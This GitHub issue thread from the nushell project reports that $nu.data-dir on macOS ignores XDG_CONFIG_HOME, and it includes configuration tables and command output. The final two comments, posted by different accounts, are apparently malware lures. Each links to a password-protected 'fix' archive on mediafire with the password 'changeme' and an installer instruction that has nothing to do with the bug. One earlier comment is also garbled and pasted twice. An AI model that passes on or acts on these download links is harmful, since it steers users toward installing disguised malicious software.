### ISSUE TITLE
`$nu.data-dir` on mac is pointing to wrong location

### ISSUE THREAD

**Issue by maxim-uvarov** [nushell/nushell#13704]
### Describe the bug

I have $env.XDG_CONFIG_HOME set and it is used for configs, yet nushell doesn't recognize it

### How to reproduce

```
> $nu.config-path
/Users/user/.config/nushell/config.nu

> $nu.data-dir
/Users/user/Library/Application Support/nushell
```

### Expected behavior

I expect this variable to point to the right dir

### Configuration

| key                | value                                    |
| ------------------ | ---------------------------------------- |
| version            | 0.97.1                                   |
| major              | 0                                        |
| minor              | 97                                       |
| patch              | 1                                        |
| branch             |                                          |
| commit_hash        |                                          |
| build_os           | macos-aarch64                            |
| build_target       | aarch64-apple-darwin                     |
| rust_version       | rustc 1.78.0 (9b00956e5 2024-04-29)      |
| rust_channel       | stable-aarch64-apple-darwin              |
| cargo_version      | cargo 1.78.0 (54d8815d0 2024-03-26)      |
| build_time         | 2024-08-21 09:24:44 +00:00               |
| build_rust_channel | release                                  |
| allocator          | mimalloc                                 |
| features           | default, sqlite, system-clipboard, trash |
| installed_plugins  | polars 0.97.1, regex                     |

**Comment by maxim-uvarov** [comment]
@fdncred Nope, I have the $XDG_CONFIG_HOME set before the launch. I checked the situation on two machines. 

On my main machine in `wezterm.lua` I have this:
```
config.default_prog = { '/Users/user/.cargo/bin/nu', '-l'}

config.set_environment_variables = {
    XDG_CONFIG_HOME = '/Users/user/.config'
}
```

and, for example, history path works as expected:
```
> $nu.history-path@fdncred Nope, I have the $XDG_CONFIG_HOME set before the launch. I checked the situation on two machines.

On my main machine in `wezterm.lua`, I have this:
```
config.default_prog = { '/Users/user/.cargo/bin/nu', '-l'}
-- config.default_prog = { '/opt/homebrew/bin/nu', '-l'}

config.set_environment_variables = {
XDG_CONFIG_HOME = '/Users/user/.config'
}
```

For example, the history path works as expected:

```
> $nu.history-path
/Users/user/.config/nushell/history.sqlite3
```

**Comment by maxim-uvarov** [comment]
And only $nu.data-dir misbehaves
```
> $nu
```
|column0|column1|
|-|-|
|default-config-dir|/Users/user/.config/nushell|
|config-path|/Users/user/.config/nushell/config.nu|
|env-path|/Users/user/.config/nushell/env.nu|
|history-path|/Users/user/.config/nushell/history.sqlite3|
|loginshell-path|/Users/user/.config/nushell/login.nu|
|plugin-path|/Users/user/.config/nushell/plugin.msgpackz|
|home-path|/Users/user|
|data-dir|/Users/user/Library/Application Support/nushell|
|cache-dir|/Users/user/Library/Caches/nushell|
|vendor-autoload-dirs|[/Library/Application Support/nushell/vendor/autoload, /usr/share/nushell/vendor/autoload, /usr/local/share/nushell/vendor/autoload, /Users/user/.local/share/nushell/vendor/autoload, /Users/user/Library/Application Support/nushell/vendor/autoload]|
|temp-path|/private/var/folders/bp/n70b2l816310jdkr3rqn11t00000gn/T|
|pid|58707|
|os-info|{name: macos, arch: aarch64, family: unix, kernel_version: 23.6.0}|
|startup-time|247ms 296µs 41ns|
|is-interactive|true|
|is-login|true|
|history-enabled|true|
|current-exe|/Users/user/.cargo/bin/nu|

**Comment by fdncred** [comment]
oh ya, that's what the code says. LOL

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
